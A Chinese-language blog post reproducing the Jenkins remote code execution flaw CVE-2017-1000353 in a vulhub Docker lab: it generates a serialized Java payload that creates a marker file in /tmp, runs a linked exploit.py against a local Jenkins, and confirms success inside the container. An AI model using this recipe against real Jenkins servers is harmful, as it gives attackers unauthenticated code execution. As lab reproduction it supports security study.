Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)
阿新 • • 發佈:2020-07-25
0x01 環境
使用vulhub搭建漏洞環境
/vulhub-master/jenkins/CVE-2017-1000353
0x02 復現
首先下載CVE-2017-1000353-1.1-SNAPSHOT-all.jar,這是生成POC的工具。
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
執行下面命令,生成位元組碼檔案:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"
執行上述程式碼後,在當前目錄下生成jenkins_poc.ser檔案,這就是序列化字串。
接著下載exploit.py,https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py
【注意】上面連結裡的exploit程式碼需要將Proxies裡面的內容註釋掉,否則會報錯
執行exp
python exploit.py http://192.168.255.130:8080 jenkins_poc.ser
0x03 檢驗
首先檢視環境的CONTAINER ID
sudo docker ps
接著進入容器內部
sudo docker exec -it 容器id bash
檢視/tmp目錄
驗證成功
參考文章:https://blog.csdn.net/JiangBuLiu/article/details/95475293